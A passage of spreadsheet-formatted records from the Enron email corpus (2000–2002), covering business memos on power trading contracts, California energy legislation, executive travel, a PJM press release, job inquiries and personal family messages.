"Paul Rowady" &lt;epr@pipeline.com&gt; on 11/14/2000 04:09:43 PM_x000D_
To: "Vince Kaminski" &lt;vkamins@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Seeking opportunity in computational finance_x000D_
_x000D_
_x000D_
Dear Vince:_x000D_
_x000D_
In following up on my voicemail message today, I attach my resume below for_x000D_
your review and consideration._x000D_
_x000D_
It's ironic that you called while I was putting the message together.  I_x000D_
will keep it short and look forward to speaking to you at your convenience._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Paul_x000D_
_x000D_
E. Paul Rowady, Jr._x000D_
2300 West Alabama, Suite 69_x000D_
Houston, Texas  77098_x000D_
_x000D_
713-807-8624   home / fax_x000D_
713-539-4541   mobile_x000D_
epr@pipeline.com_x000D_
_x000D_
 - Paul Rowady2.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Sep 2000 02:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.zufferli@enron.com', 'rogers.herndon@enron.com', 'kevin.presto@enron.com'})</t>
  </si>
  <si>
    <t>Meeting at Dynegy office on Sept 12th, 2:30 to 5:30</t>
  </si>
  <si>
    <t>Dynegy has requested a meeting with us to discuss what an "Into Product" is _x000D_
and how this product works with what is currently going on with transmission _x000D_
and how it may be impacted by future changes in transmission.  Attendees from _x000D_
Dynegy will include Griff Jones (Dynegy's head of trading), Matt (whose last _x000D_
name I didn't get) and their lawyer Harlan Murphy.  If you think somebody _x000D_
else should attend or if you want them to come over here, let me know and I _x000D_
can talk to Harlan.  Assuming the meeting stays scheduled, I will schedule an _x000D_
internal meeting to briefly go over the EEI Into definition before we meet _x000D_
with Dynegy._x000D_
_x000D_
As you are aware, in connection with the EEI effort we worked extensively _x000D_
with a large group of industry participants to define  what an Into Product _x000D_
is.  Dynegy and PECO were the two companies that were very outspoken against _x000D_
they way the product ultimately got defined.  Dynegy put on a big dog and _x000D_
pony show before a large group of industry participants trying to argue that _x000D_
EEI's Into product was flawed.   Their position, while not completely _x000D_
expressed, hinges on the concept that if you sell an Into Product and are _x000D_
making deliveries on firm transmission, then the Seller will always be _x000D_
excused from performance if the firm transmission gets cut for any reason (in _x000D_
general, this is contrary to EEI which obligates the Seller to go to another _x000D_
interface unless the cut was due to Buyer's use of non firm transmission when _x000D_
firm was available or due to Buyer's attempt to move the energy away from the _x000D_
receiving control area).  Dynegy's approach was driven by the fact that they _x000D_
have extensive generation and that the vast majority of their deals go _x000D_
physical.  At the time, we suggested that if they were worried about cuts in _x000D_
firm transmission, then they needed to sell a transmission contingent _x000D_
product.  Dynegy's concept was rejected at the EEI meetings._x000D_
_x000D_
I hope that the meeting will accomplish the following goals:_x000D_
_x000D_
1.  Get Dynegy to agree to trade Into with us under a common Into definition _x000D_
- Dynegy will not sign an EEI with us because of the Into definition.  We _x000D_
trade Into extensively with them, but clearly do not have a common _x000D_
understanding of what we are trading.  Critical to clear up this ambiguity._x000D_
_x000D_
2. Secure Dynegy as an advocate of EEI - Because Dynegy was so vocal against _x000D_
EEI's Into definition, if they now started using EEI, it would further boost _x000D_
acceptance of the contract and isolate PECO as the only other major voice _x000D_
against the Into definition._x000D_
_x000D_
3. Reexamine the Into Product as it is currently drafted and consider what _x000D_
will happen as access to transmission changes - Because the Into product is _x000D_
such an important part of East trading today, it is critical that internally _x000D_
we all agree how it should operate. Additionally, it is critical that we _x000D_
start thinking about how the Into product will be affected by changes in _x000D_
transmission, such as the advent of RTOs (with long term Into deals we may _x000D_
want to consider addressing what happens if the receiving control area goes _x000D_
into an RTO)_x000D_
_x000D_
Call me with any questions/thoughts._x000D_
_x000D_
Thanks_x000D_
Elizabeth_x000D_
 36349</t>
  </si>
  <si>
    <t>Thu, 20 Sep 2001 14:51:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'frank.sayre@enron.com', 'marie.heard@enron.com', 'pinto.leite@enron.com', 'mark.greenberg@enron.com', 'c..koehler@enron.com', 'tana.jones@enron.com', 'sara.shackleton@enron.com', 'stephanie.panus@enron.com', 'brent.hendry@enron.com', 'samantha.boyd@enron.com', 'cheryl.nelson@enron.com', 'mary.cook@enron.com', 'susan.bailey@enron.com', 'n..gray@enron.com'})</t>
  </si>
  <si>
    <t>Friday Happy Hour</t>
  </si>
  <si>
    <t>I hope you can all join us for happy hour tomorrow from 6:00 at Christopher's Wine Bar.  Christopher's is located at 2516 Times Blvd. in Rice Village._x000D_
_x000D_
Mark Taylor_x000D_
Vice President and General Counsel_x000D_
Enron Wholesale Services_x000D_
(713)853-7459</t>
  </si>
  <si>
    <t>Tue, 19 Dec 2000 23:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Please add Carey Metz to our bidweek index survey spreadsheet.  Thanks._x000D_
_x000D_
Mike</t>
  </si>
  <si>
    <t>Fri, 23 Jun 2000 10:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Utilicorp "See Attachment" Confirmation</t>
  </si>
  <si>
    <t xml:space="preserve">Jarrod:_x000D_
I just made a few chnages._x000D_
Carol_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Jarrod Cyprow_x000D_
	06/23/2000 02:20 PM_x000D_
		 _x000D_
		 To: Carol St Clair/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Utilicorp "See Attachment" Confirmation_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 14 Jan 2000 01:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'douglas.moreno@enron.com'})</t>
  </si>
  <si>
    <t>Re: Rochester</t>
  </si>
  <si>
    <t>Thanks so much for that quick response.  One more favor - are you able to _x000D_
pull Con Ed Annual report?  The ticker is "ED". Thanks_x000D_
Ben</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 07:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: xmas</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the suggestions for Richard.  Let me know if you think of other _x000D_
ideas - I need b'day and Christmas ideas.  _x000D_
_x000D_
Probably the easiest thing to bring for Thanksgiving could be a dessert -- or _x000D_
something else that is a favorite of your family.  I know that it is really _x000D_
kind of hard to travel with food -- particularly since you will probably be _x000D_
working on Wednesday morning.  I have made Thanksgiving dinner for so many _x000D_
years (one of the few times that I really like to cook), that I will be glad _x000D_
to cover it.  Your company will be the very best thing that you can bring.  _x000D_
We are looking forward to having you all here.  (The sleeper sofa for the _x000D_
media room will arrive this Friday!)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Cindy White" &lt;cwhite@viviance.com&gt; on 11/14/2000 11:10:32 AM_x000D_
To: "Sally" &lt;sally.beck@enron.com&gt;_x000D_
cc:  _x000D_
Subject: xmas_x000D_
_x000D_
_x000D_
Hi..._x000D_
_x000D_
Still trying to think of things for Richard.  Electric can opener,_x000D_
Guatemalan Antigua coffee, new shirt for racquetball--he says XXL--hard to_x000D_
find but most chain sporting good stores have that size--probably white or_x000D_
something very basic with a collar.  He really does need this--his_x000D_
racquetball duds are looking pretty bad..._x000D_
_x000D_
We are looking forward to Thanksgiving--can't believe it is next week!  What_x000D_
can we bring?_x000D_
_x000D_
Cindy_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 23:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rob.kean@worldnet.att.net'})</t>
  </si>
  <si>
    <t>Re: Phil's Birthday</t>
  </si>
  <si>
    <t xml:space="preserve">I'm in.  A;lso, I don't think we have settled up on Mom and Dad's xmas _x000D_
present yet.  What do I owe?_x000D_
_x000D_
_x000D_
_x000D_
	"Rob Kean" &lt;rob.kean@worldnet.att.net&gt;_x000D_
	02/05/2001 09:05 PM_x000D_
	Please respond to rob.kean_x000D_
		 _x000D_
		 To: "Doug &amp; Karen Reiman \(E-mail\)" &lt;dkreiman@mcleodusa.net&gt;, "Steve &amp; _x000D_
Melissa Kean \(E-mail\)" &lt;skean@enron.com&gt;, "Melissa Kean \(E-mail\)" _x000D_
&lt;kean@rice.edu&gt;_x000D_
		 cc: _x000D_
		 Subject: Phil's Birthday_x000D_
_x000D_
It's alittle early to be talking about Phil's birhtday but I have had some_x000D_
conversations with him about replacing his PC with a more modern one that I_x000D_
will build for him.  I want to know if you want to go in with me. He'll get_x000D_
the PC in the near future but I don't expect anyone to contribute until his_x000D_
birthday._x000D_
_x000D_
Here's the way it would work: we give Phil a new PC, I send an old Compaq of_x000D_
ours to Kathy and Alan Wedig, Phil sends his old PC to some friends of mine_x000D_
who live in Duluth, MN.  That means that our entire family will be_x000D_
connected._x000D_
_x000D_
If not, I would send the Old Compaq to Phil otherwise and then he could send_x000D_
his old one to Kathy and Alan.  The only problem with this scenario is that_x000D_
Phil's old PC is getting a little too old.  Our friends in Duluth wouldn't_x000D_
mind getting an old PC because they've never owned one.  I thought that Phil_x000D_
would benefit the most from getting a brand new PC.  The old Compaq is will_x000D_
still be okay for a while and Kathy should be fine with it._x000D_
_x000D_
What do you guys think?  If i do this right, Kathy would have a PC for her_x000D_
birhtday in March._x000D_
_x000D_
Rob_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 6 Jul 2001 06:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mike.smith@enron.com', 'jeremy.blachman@enron.com', 'kristin.walsh@enron.com', 'alan.comnes@enron.com', 'vicki.sharp@enron.com', 'phillip.allen@enron.com', 'harry.kingerski@enron.com', 'linda.robertson@enron.com', 'christopher.calger@enron.com', 'tim.belden@enron.com', 'richard.shapiro@enron.com', 'donald.black@enron.com', 'michael.tribolet@enron.com', 'skean@enron.com', 'susan.mara@enron.com', 'wanda.curry@enron.com'})</t>
  </si>
  <si>
    <t>California Update--Legislative Push Underway</t>
  </si>
  <si>
    <t>Hertzberg (speaker of the CA Assembly) called a meeting yesterday afternoon _x000D_
of the group of market participants that have been negotiating the _x000D_
"core/noncore" proposal in California.  The purpose of the meeting was to _x000D_
brief us on their activities and their gameplan for trying to find a solution _x000D_
for California.  Here's a summary of the meeting.  Please keep confidential._x000D_
_x000D_
Work will be done over the weekend to put the core/noncore proposal in _x000D_
legislative language.  (We will be in the room.)_x000D_
Work done by the "Plan B" group in the Assembly (Joe Dutra and Joe Nation) _x000D_
will also be put into legislative language over the weekend._x000D_
Because no proposal is "comprehensive," a complete legislative package will _x000D_
be created from the various pieces that have been worked on thus far (i.e., _x000D_
core/noncore, "Plan B," Edison MOU)_x000D_
In addition, there are Republican demands that Hertzberg will need to address _x000D_
(e.g., end the litigation) in order to achieve bi-partison support, which is _x000D_
what Hertzberg's shooting for. _x000D_
To move the legislation, the plan is to establish a "conference committee," _x000D_
comprised of an equal number of Democrats and Republicans._x000D_
The committe would begin work on Monday and would attempt to finish putting a _x000D_
comprehensive bill together, vote it out of the Legislature and send it to _x000D_
the Governor for signing by Monday, July 16th._x000D_
July 16th is the deadline because that is the date that the PUC will issue _x000D_
its proposed decision regarding, among other things, how DWR's revenue _x000D_
requirement will be put into rates, whether Direct Access needs to be _x000D_
suspended, etc._x000D_
The PUC is issuing the draft on the 16th in order to give everyone 30 days to _x000D_
review and comment before the Commission votes on a final order on August _x000D_
15th.  (The PUC will actually issue a "thought piece" on Monday the 9th and _x000D_
will use reactions to the "thought piece" to craft the develop the proposed _x000D_
decision it plans to issue on the 16th.)_x000D_
All of this is still up in the air, however.  As of right now, the leader of _x000D_
the Senate (Burton) has not agreed to Hertzberg's gameplan and the _x000D_
Republicans, while interested, have not yet committed to join the process.</t>
  </si>
  <si>
    <t>Tue, 11 Jan 2000 01:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'adele.raspe2@pseg.com'})</t>
  </si>
  <si>
    <t>Re: electronic trading agmt.</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Mark Taylor/HOU/ECT on 01/11/2000 09:38 _x000D_
AM ---------------------------_x000D_
To: "Raspe, Adele M." &lt;Adele.Raspe2@pseg.com&gt;_x000D_
cc:  _x000D_
Subject: Re: electronic trading agmt.  _x000D_
_x000D_
Adele,_x000D_
_x000D_
Here is a revised version.  Let me know what you think._x000D_
_x000D_
Mark_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 10 Jan 2002 10:06:13 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'pjmcustomerrelationsandtraining@pjm.com'})</t>
  </si>
  <si>
    <t>frozenset({'pjm-customer-info@risc1.pjm.com'})</t>
  </si>
  <si>
    <t>News release: PJM SUBMITS APPLICATION TO OVERSEE SOUTHEAST RTO</t>
  </si>
  <si>
    <t>Message sent from the pjm-customer-info mailing list at pjm-customer-info@majordomo.pjm.com:_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt; For Immediate Release_x000D_
&gt; PJM SUBMITS APPLICATION_x000D_
&gt; TO OVERSEE SOUTHEAST RTO_x000D_
&gt;_x000D_
&gt; (Valley Forge, PA-January 8, 2002) PJM Interconnection, the country's only_x000D_
&gt; fully functioning Regional Transmission Organization (RTO), today submitted a_x000D_
&gt; Preliminary Statement of Qualifications to be considered for the Independent_x000D_
&gt; System Administrator (ISA) for SeTrans - a proposed Southeast RTO._x000D_
&gt;_x000D_
&gt; The SeTrans Owners Group has proposed the development of a RTO to provide_x000D_
&gt; system operations, market administration and regional system planning for nine_x000D_
&gt; utilities and public power companies operating in eight Southeastern and Gulf_x000D_
&gt; states. It is envisioned that the SeTrans ISA will be responsible for_x000D_
&gt; operating 53,000 miles of transmission and more than 73,000 megawatts of_x000D_
&gt; generation capacity spanning a region of nearly 291,000 square miles, once the_x000D_
&gt; RTO becomes operational.  The SeTrans Owners Group involved in the RTO_x000D_
&gt; development include: Southern Company, Entergy, Municipal Electric Authority_x000D_
&gt; of Georgia, Santee Cooper, Jacksonville Electric Authority, Georgia_x000D_
&gt; Transmission Corporation, Southwest Mississippi Electric Power Association,_x000D_
&gt; and the cities of Tallahassee, Florida and Dalton, Georgia._x000D_
&gt;_x000D_
&gt; If selected as the ISA, PJM's unique qualifications would provide proven_x000D_
&gt; solutions and services necessary to support both the implementation and_x000D_
&gt; ongoing operation of the SeTrans RTO.  PJM is offering its demonstrated_x000D_
&gt; organizational capabilities, intellectual capital and proven information-based_x000D_
&gt; products and services to create efficiencies for energy market participants._x000D_
&gt;_x000D_
&gt; PJM, the country's only fully functioning RTO, operates the world's largest_x000D_
&gt; competitive wholesale electricity market and one of North America's largest_x000D_
&gt; power grids. The company currently coordinates a pooled generating capacity of_x000D_
&gt; more than 59,000 megawatts and operates a wholesale electricity market with_x000D_
&gt; more than 200 market buyers, sellers and traders of electricity. PJM has_x000D_
&gt; administered more than $5 billion in energy and energy service trades since_x000D_
&gt; the regional markets opened in 1997. More than 70 nations have sent delegates_x000D_
&gt; to PJM to learn about the market model and the operation of the grid in the_x000D_
&gt; mid-Atlantic states. Visit PJM at www.pjm.com._x000D_
&gt; ####_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
Please DO NOT REPLY to this message. If you have a question for PJM Customer_x000D_
Relations and Training, please complete and submit this form:_x000D_
http://www.pjm.com/contact/questions.html_x000D_
_x000D_
To unsubscribe from this list, send an e-mail to majordomo@majordomo.pjm.com_x000D_
containing only the following line in the body of the e-mail:_x000D_
_x000D_
unsubscribe pjm-customer-info</t>
  </si>
  <si>
    <t>Wed, 7 Feb 2001 03:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rachel.steffens@ipgdirect.com', 'rich.heidorn@ipgdirect.com', 'greggdaileda@email.msn.com', 'suzanna.strangmeier@ipgdirect.com', 'ellen.clardy@ipgdirect.com'})</t>
  </si>
  <si>
    <t>New price reporters at TradersNews</t>
  </si>
  <si>
    <t>We're pleased to announce two new price reporters  on our team: Rachel _x000D_
Steffens, who comes to us from our gas  side, and Gregg Daileda. Thank you _x000D_
for your courtesy and  cooperation with all of us._x000D_
?_x000D_
The TradersNews hourly indexes have been posted for  Feb. 6; for industry and _x000D_
markets coverage and our hourly, daily and term  indexes, log on to _x000D_
www.tradersnewsenergy.com._x000D_
?_x000D_
Bobette_x000D_
?_x000D_
?_x000D_
Bobette  Riner???????????????????????????????  _x000D_
Senior Power Markets Analyst??????  _x000D_
TradersNews Energy_x000D_
713/647-8690_x000D_
FAX: 713/647-7552_x000D_
cell:  832/428-7008_x000D_
bobette.riner@ipgdirect.com_x000D_
http://www.tradersnewspower.com_x000D_
?_x000D_
?</t>
  </si>
  <si>
    <t>Fri, 27 Apr 2001 12:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: ken lay tour</t>
  </si>
  <si>
    <t xml:space="preserve">I received a return call from Lelanie in Governor Davis' office this _x000D_
evening.  She said the Governor wanted to invite Ken Lay and Jeff Skilling to _x000D_
a meeting the Governor is having at 2:00 p.m. in Sacramento on May 2 with a _x000D_
lot of CEOs.  I still pressed for a one on one meeting on May 3 in _x000D_
Sacramento, but she told me the Governor wanted to have the one meeting all _x000D_
at once and his schedule was very tight on Thursday, May 3.   I transferred _x000D_
her to Sherri and called Ken.  Ken wanted me to try to get more specific _x000D_
information, which she shared that it is with generators - Sempra, Williams, _x000D_
CalPine, Duke, Dynegy, and Reliant.  She also said since the Governor has _x000D_
worked with Ken, she thought he might prefer that he attend.  Ken said to let _x000D_
you all know and be thinking whether we even want to do it.  He said one _x000D_
thought might be that he'd do that meeting and maybe Jeff could do the one in _x000D_
L.A. on May 2._x000D_
_x000D_
Talk to you Monday._x000D_
_x000D_
Rosie_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Janel Guerrero_x000D_
04/27/2001 02:39 PM_x000D_
To: Rosalee Fleming/Corp/Enron@ENRON, Maureen McVicker/NA/Enron@Enron, Jeff _x000D_
Dasovich/NA/Enron@Enron_x000D_
cc: Richard Shapiro/NA/Enron@Enron, Paul Kaufman/PDX/ECT@ECT _x000D_
Subject: ken lay tour_x000D_
_x000D_
Just so we're all on the same page......Dasovich will arrive in Houston on _x000D_
Monday (mid-day) and will travel with Dr. Lay beginning on Wednesday (to _x000D_
Austin) and then on to LAX, Sacramento etc.  Steve said there really isn't _x000D_
time to have a pre-briefing so any questions that Ken has will have to be _x000D_
addressed enroute to CA.  _x000D_
_x000D_
Rosalee....we're giving Steve the briefing book today so he can review over _x000D_
the weekend and we'll have a final copy to Ken before he departs next week.  _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 28 Jul 2000 09:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stephen.burns@enron.com'})</t>
  </si>
  <si>
    <t>Nick O'Day meeting with Carla Hills</t>
  </si>
  <si>
    <t>Steve:_x000D_
_x000D_
Joe called and asked me to summarize for you the meeting between Nick and _x000D_
Carla a few weeks ago._x000D_
_x000D_
Nick outlined the current state of play in Tokyo.  To summarize what I took _x000D_
as his central message -- now is a particularly sensitive time for Enron in _x000D_
Japan.  They have a high profile and are establishing good relationships with _x000D_
the right government officials and business leaders, both publicly and behind _x000D_
the scenes.  They're in the process of bringing on a senior Japanese national _x000D_
in the reg/government affairs team, and an experienced PR person as well.  _x000D_
Both come with their own set of contacts and experience that Nick would like _x000D_
to give an opportunity to develop.   With the electricity deregulation still _x000D_
shaking out, and Enron Online Japan just being launched days ago, Carla's _x000D_
high profile might be valuable at some point and on certain issues -- but now _x000D_
may not be that time. _x000D_
_x000D_
Carla replied that she understood the need for sensitivity.  She outlined her _x000D_
contacts in Japan, which are impressive.  She said she would only go to _x000D_
reinforce a message that a client wanted delivered -- to have another party _x000D_
support the Enron message to the right people is often valuable, especially _x000D_
in Japan.  She said she understood timing, and reiterated that she was happy _x000D_
to help when called upon._x000D_
_x000D_
No decisions were made on short-term travel by Carla to Japan.</t>
  </si>
  <si>
    <t>Tue, 26 Sep 2000 06:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jennifer.stewart@enron.com'})</t>
  </si>
  <si>
    <t>Re: oops...</t>
  </si>
  <si>
    <t xml:space="preserve">Well, thank you for the clarification.  I was confused because I was hanging _x000D_
out with him Friday at happy hour and he said he was busier than ever.  I _x000D_
mentioned that I talked to you, and he had nothing but nice things to say _x000D_
about you.  Hope all is well._x000D_
_x000D_
Mat  </t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 00:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'qchen1@tulane.edu'})</t>
  </si>
  <si>
    <t>Re: MBA Career Opportunity</t>
  </si>
  <si>
    <t>Christine,_x000D_
_x000D_
We shall arrange a phone interview with you._x000D_
_x000D_
Vince</t>
  </si>
  <si>
    <t>Fri, 25 Aug 2000 08:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Hey Shorty,_x000D_
_x000D_
Sorry your week has been going poorly (I guess you feel like I did Wednesday _x000D_
night).  But on the bright side, college football starts this weekend which _x000D_
is always a plus and today is Friday which makes this bad week over.  I am in _x000D_
middle of packing once again for another move but the good news is that I get _x000D_
kicked out by 5:00 today.  I was checking out UT schedule and it looks like _x000D_
they have a pansy schedule (unlike UCLA that has to play Alabama #3 and _x000D_
Michigan #4 early in the season).  Any comments on that?_x000D_
_x000D_
Ted_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan M Scott_x000D_
08/25/2000 02:37 PM_x000D_
To: Ted Noble/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
Well, this may go down as one of my absolute worst weeks ever.  Hope yours _x000D_
was better and that you made a full recovery from Steak Night._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Jun 2000 03:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Call Chris 713-853-4743</t>
  </si>
  <si>
    <t>John, call me when you get a chance.  I called 330-493-7790 and there is no _x000D_
voicemail.</t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 12:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'key.kasravi@enron.com'})</t>
  </si>
  <si>
    <t>Re: your book recommendation</t>
  </si>
  <si>
    <t>If it was about trading it was "Reminisance of a Stock Operator"</t>
  </si>
  <si>
    <t>Fri, 2 Jun 2000 07:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Bammel PMA's</t>
  </si>
  <si>
    <t xml:space="preserve">I'm sure you were excited to see this email.  You get to reroll the whole _x000D_
year...again!!!  Have fun with that entry._x000D_
_x000D_
Robin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kenny J Soignet_x000D_
06/02/2000 01:46 PM_x000D_
To: Jim Schwieger/HOU/ECT@ECT, Kenny J Soignet/HOU/ECT@ECT, Rita _x000D_
Wynne/HOU/ECT@ECT, Daren J Farmer/HOU/ECT@ECT, Becky Pitre/HOU/ECT@ECT, _x000D_
Shannon Carmichael/HOU/ECT@ECT, Robin Rodrigue/HOU/ECT@ECT, David _x000D_
Baumbach/HOU/ECT@ECT, Janie Aguayo/HOU/ECT@ECT, Fred Boas/HOU/ECT@ECT, Howard _x000D_
B Camp/HOU/ECT@ECT, Brenda F Herod/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Bammel PMA's_x000D_
_x000D_
These are revised schedules for Jan, Mar, &amp;  Apr 2000 and the estimate _x000D_
(scheduled) volumes for May._x000D_
The prices were revised to capture Texas General storage revenue (fuel _x000D_
retention) in Jan, Mar, &amp; Apr.  The fuel volumes are shown as a zero buy _x000D_
price for the storage book._x000D_
The April also has volume true-ups due to actual metered volumes. (Schedule _x000D_
6).  Another adjustment was made in April to true up the cumulative facility _x000D_
balance, (4,295 mmbtu)._x000D_
_x000D_
Thanks,_x000D_
Kenny_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 28 Oct 2001 10:53:51 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'joseph.deffner@enron.com'})</t>
  </si>
  <si>
    <t>RE: any good news today?</t>
  </si>
  <si>
    <t>What arr you up to with Vince_x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld</t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 11:40:09 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'eric.faucheaux@enron.com', 'ben.asante@enron.com'})</t>
  </si>
  <si>
    <t>Topock Lateral</t>
  </si>
  <si>
    <t>Gentlemen,_x000D_
In addition to looking for ways in which Transwestern can improve mainline deliverability, another important criteria is access to markets.  With the addition of the Calpine South Point project, we have delivery point capacity off the Topock Lateral approaching 1 Bcf/d.  However, we are currently limited to 400,000 Dth/d of capacity in the Topock Lateral itself.  Steve has asked us to look at what facilities/costs would be involved in increasing the deliverability of the Topock Lateral (no mainline capacity additions are implied, beyond the addition of Red Rock)._x000D_
_x000D_
What would be the best/cheapest capacity additions we could make with respect to the Topock Lateral?  Drawing on my vast engineering expertise (ha,ha), it seems to me that with the directly connected power plant located approx. midway along the lateral line, wouldn't a compressor station immediately upstream of Calpine offer us the dual benefit of not only increased lateral capacity, but additional operating flexibility to meet the load curves for the plant?  Anyway, you guys are the experts, but we're asking that you look at a few cases and sketch out the associated costs of increasing the Topock Lateral capacity.  By way of suggested guidelines, I'd say that we'd like to see cases that provide for not less than 50 MMcf/d of incremental capacity, and not more than a doubling of the current line capacity (400 MMcf/d).  Again, its a cost/benefit sort of analysis, so we're really looking to key in on the cheapest, most economical capacity addition._x000D_
_x000D_
James, would you remain plugged in here, and given the information that Eric and/or Ben may provide, be prepared to give us some rate implications for this capacity addition?_x000D_
_x000D_
Unless this creates too big a burden on your existing schedule of projects, can we set a deadline of March 30th with some Topock Lateral expansion cases along with costs/rates implications?  Please let me know.  If you need help with assumptions and/or need additional information, please give me a shout.  Thanks.</t>
  </si>
  <si>
    <t>Terry Kowalki/Vacation</t>
  </si>
  <si>
    <t>CALENDAR ENTRY:	APPOINTMENT_x000D_
_x000D_
Description:_x000D_
	Terry Kowalki/Vacation_x000D_
_x000D_
Date:		12/21/2000_x000D_
Time:		4:00 PM - 5:00 PM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Outlook Migration Team_x000D_
_x000D_
Detailed Description:</t>
  </si>
  <si>
    <t>Mon, 1 Oct 2001 13:44:13 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'kimberly.watson@enron.com', 'michelle.lokay@enron.com', 'lindy.donoho@enron.com', 'mark.mcconnell@enron.com', "paul.y'barbo@enron.com"})</t>
  </si>
  <si>
    <t>Texaco Grand Prix Tickets</t>
  </si>
  <si>
    <t>I have 8 tickets and paddock passes for the Grand Prix on Saturday. Please let me know if you would like them. Thanks.</t>
  </si>
  <si>
    <t>Thu, 14 Sep 2000 10:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Update on UT - Enron Activities: My Conversation with Rick Causey</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 09/14/2000 _x000D_
05:21 PM ---------------------------_x000D_
_x000D_
_x000D_
"Ehud I. Ronn" &lt;eronn@mail.utexas.edu&gt; on 09/14/2000 10:15:33 AM_x000D_
To: vkamins@enron.com_x000D_
cc:  _x000D_
Subject: Update on UT - Enron Activities: My Conversation with Rick Causey_x000D_
_x000D_
_x000D_
Vince,_x000D_
_x000D_
Good morning._x000D_
_x000D_
As you may know, last Thur. Enron honored this year's recipients of the_x000D_
Enron MBA Excellence Fund Scholars at a dinner in Austin.  In addition to_x000D_
the three recipients, Business School Dean May and several of my_x000D_
colleagues, Enron attendees included Sally Beck, Cindy Justice, Karen_x000D_
Marshall (newly-appointed coordinator of higher education initiatives for_x000D_
Enron Community Relations Dept.) and Rick Causey._x000D_
_x000D_
I write you at this time to advise you I had occasion to discuss two_x000D_
current Enron/UT issues with Rick:_x000D_
I.  Spring 2001 Conference Participation by Jeffrey K. Skilling_x000D_
II.  UT Participation in EnronTraining Activities_x000D_
Per my conversation with Rick last Thur., I followed up on that discussion_x000D_
with an e-mail this morn that touched on those two topics._x000D_
_x000D_
I.  With respect to the first, I wrote Rick this morning that:_x000D_
_x000D_
1.  We at the UT Center for Energy Finance Education and Research (CEFER)_x000D_
are planning a practitioner-industry Conference in Spring 2001 (late Feb._x000D_
or early March) to discuss four topics:  Risk management, Deregulation,_x000D_
Real options, and International/globalization._x000D_
2.  The Conference will kick off with a dinner/keynote address Thur._x000D_
evening, then continue all day Fri._x000D_
3.  I have had several discussions with you regarding Conference timing,_x000D_
structure, participation and content._x000D_
4.  Further to Rick's agreement to do so during our discussion last Thur.,_x000D_
in today's e-mail I asked Rick to extend an invitation to Jeff Skilling to_x000D_
be the keynote speaker at the Thur. evening dinner._x000D_
_x000D_
II.  With respect to the second topic, Rick and I also discussed UT_x000D_
partcipation in Enron Corp. internal training for incoming Enron Corp._x000D_
analysts and associates.  Consequently, I e-mailed Rick this morning a_x000D_
specific set of issues -- "Valuation and Risk Management in Energy Markets"_x000D_
-- which my UT colleagues and I have covered in public as well as_x000D_
customized exec ed settings, and which we would be pleased to customize for_x000D_
presentation at Enron.  FYI, I am enclosing a copy of said topics at the_x000D_
end of this e-mail._x000D_
_x000D_
I look forward to seeing you again soon, and to your UT visit on 10/11.  Best,_x000D_
Ehud_x000D_
_x000D_
_x000D_
Training Program:  "Valuation and Risk Management in Energy Markets"_x000D_
_x000D_
Target Audience:  Associates, Analysts, Traders, Marketing/Sales, Risk_x000D_
managers, Financial analysts_x000D_
_x000D_
Program Objectives:_x000D_
1.  Understanding the physical and financial U. S. markets for electricity_x000D_
